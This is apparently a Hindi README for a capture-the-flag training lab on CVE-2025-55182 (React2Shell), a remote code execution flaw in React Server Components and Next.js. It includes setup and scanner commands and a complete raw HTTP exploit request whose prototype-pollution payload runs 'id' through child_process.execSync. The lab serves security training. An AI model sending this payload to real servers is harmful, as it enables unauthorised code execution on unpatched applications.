
CVE-2025-55182 (React Server Components में RCE) का शोषण करने वाला CTF लैब वातावरण, जिसमें असुरक्षित Next.js ब्लॉग, डिटेक्शन स्क्रिप्ट्स, और व्यावहारिक सुरक्षा प्रशिक्षण हेतु मैनुअल एक्सप्लॉइट पेलोड्स शामिल हैं।
यह रिपॉजिटरी Next.js और React Server Components का उपयोग करने वाले एक साइबर सुरक्षा ब्लॉग पर आधारित एक कमजोर CTF (Capture The Flag) वातावरण प्रदान करती है।
CVE-2025-55182 : React Server Components संस्करण 19.0.0, 19.1.0, 19.1.1 और 19.2.0 में प्री-ऑथेंटिकेशन रिमोट कोड एक्ज़ीक्यूशन (RCE) कमजोरी। कमजोर कोड Server Function एंडपॉइंट्स को भेजे गए HTTP अनुरोधों के पेलोड को असुरक्षित रूप से डी-सीरियलाइज़ करता है।
CVE-2025-66478 : App Router का उपयोग करने वाले Next.js अनुप्रयोगों पर प्रभाव।
यह चैलेंज एक साइबर सुरक्षा ब्लॉग प्रस्तुत करता है जिसमें शामिल हैं:
ब्लॉग React और Next.js के कमजोर संस्करणों का उपयोग करता है, जिससे React2Shell कमजोरी का शोषण संभव होता है।
| पैकेज | संस्करण |
|---|---|
next | 16.0.6 |
react | 19.2.0 |
react-dom | 19.2.0 |
# Construire l'image
docker build -t react2shell-poc .
# Lancer le conteneur
docker run --rm -p 127.0.0.1:3000:3000 react2shell-poc
npm install
npm run build
npm run start
फिर, http://127.0.0.1:3000 पर जाएं
git clone https://github.com/assetnote/react2shell-scanner && cd react2shell-scanner
virtualenv venv && source venv/bin/activate && pip install -r requirements.txt
python3 scanner.py -u http://127.0.0.1:3000
nuclei -t ./nuclei-template/CVE-2025-55182.yaml -u http://127.0.0.1:3000
Python एक्सप्लॉइट के लिए React2Shell/ फ़ोल्डर देखें।
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
प्रतिक्रिया के x-action-redirect हेडर में id कमांड का परिणाम मौजूद होगा।
simple-nextjs-blog टेम्पलेट और कमजोर CVE-2025-55182 वातावरण पर आधारित कस्टम CTF चैलेंज।